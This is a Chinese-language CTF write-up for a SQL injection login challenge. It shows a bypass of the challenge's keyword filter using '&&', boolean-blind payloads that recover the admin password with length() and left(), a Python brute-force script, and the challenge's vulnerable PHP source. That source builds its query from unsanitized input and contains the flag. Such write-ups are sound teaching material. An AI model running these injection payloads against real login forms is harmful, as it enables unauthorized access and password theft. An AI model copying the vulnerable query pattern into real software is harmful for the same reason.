实验室每日一题WP-12月5日

打开题目,看到是让登录,查看网页源码可以发现一个hint

<!--hint:数据库中密码字段名为pass,有且只有一个用户名为admin的用户-->

这道题过滤的字符比较多

$filter = "mid|substr|\*|\s|and|select|from|where|union|join|sleep|benchmark|rollup|limit|like|rlike|regxp"; 以及空格

根据提示可以猜到是要找到admin的密码。

and被过滤了可以用%26%26 (&&)替换

所以可以构造payload  user=admin'%26%26length(pass)='1&pass=1   先来确定密码的长度

可以用脚本跑.....也可以手动...

确定好密码长度后,再来构造playload来爆破密码

user=admin'%26%26left(pass,1)='0&pass=1

 

附上py脚本

 

import requests

def getlen(url):
    i=1;
    while 1:
        payload={'user':"admin'&&length(pass)='%d"%(i),'pass':'123456'}
        #print payload
        reponse=requests.post(url,payload)
        text=reponse.content
        #print text
        if text.find("password error!")!=-1:
            break
        else:
            i=i+1
    return i

def getpwd(url,len,list):
    ch=""
    for i in range(1,len+1):
        for c in list:
            payload={'user':"admin'&&left(pass,%d)='%s"%(i,ch+c),'pass':'123456'}
            reponse=requests.post(url,payload)
            #print payload
            text=reponse.content
            #print text
            if text.find("password error!")!=-1:
                ch=ch+c
                print (ch)
                break
            else:
                pass

if __name__=='__main__':
    list=[]
    for i in range(10):
        list.append(str(i))
        '''
    for i in range(65,91):
        list.append(chr(i)) 
        '''
    for i in range(97,123):
        list.append(chr(i))
    url="http://"
    len=getlen(url)
    print (len)

    getpwd(url,len,list)

 

LEFT(string, number_of_chars)

LEFT()函数从字符串中提取多个字符(从左开始)。

 

附上php源码

 

<?php
//sql注入绕过, 
error_reporting(0);
if (!isset($_POST['user']) || !isset($_POST['pass'])) {
?>
<!DOCTYPE html>
<html lang="en" class="no-js">

    <head>

        <meta charset="utf-8">
        <title>Fullscreen Login</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="description" content="">
        <meta name="author" content="">

        <!-- CSS -->
        <link rel='stylesheet' href='http://fonts.googleapis.com/css?family=PT+Sans:400,700'>
        <link rel="stylesheet" href="assets/css/reset.css">
        <link rel="stylesheet" href="assets/css/supersized.css">
        <link rel="stylesheet" href="assets/css/style.css">

        <!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
        <!--[if lt IE 9]>
            <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
        <![endif]-->

    </head>

    <body>

        <div class="page-container">
            <h1>Login</h1>
            <form action="" method="post">
                <input type="text" name="user" class="username" placeholder="Username">
                <input type="password" name="pass" class="password" placeholder="Password">
                <button type="submit">Sign  in</button>
                <div class="error"><span>+</span></div>
            </form>
        </div>

        <!-- Javascript -->
        <script src="assets/js/jquery-1.8.2.min.js"></script>
        <script src="assets/js/supersized.3.2.7.min.js"></script>
        <script src="assets/js/supersized-init.js"></script>
        <script src="assets/js/scripts.js"></script>

    </body>

</html>

<?php    
    echo '<!--hint:数据库中密码字段名为pass,有且只有一个用户名为admin的用户-->'."<br/>";
    die;
}
function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
        print "naive";
        exit();
    }
    
}
$filter = "mid|substr|\*|\s|and|select|from|where|union|join|sleep|benchmark|rollup|limit|like|rlike|regxp";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}
$con = mysql_connect("localhost","帐号","密码");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="ctf";
mysql_select_db($db, $con);
$sql="SELECT * FROM ctfinterest WHERE user = '{$_POST['user']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pass'] == $_POST['pass']) {
        print "Flag{0f_C0urse_Y0u_C4n_D0_1t!}";
    }else{
        print "password error!";
    }
}else{
    print "no such user!";
}
mysql_close($con);
?>

 

posted @ 2020-12-05 11:55  Riddler  阅读(266)  评论(0编辑  收藏  举报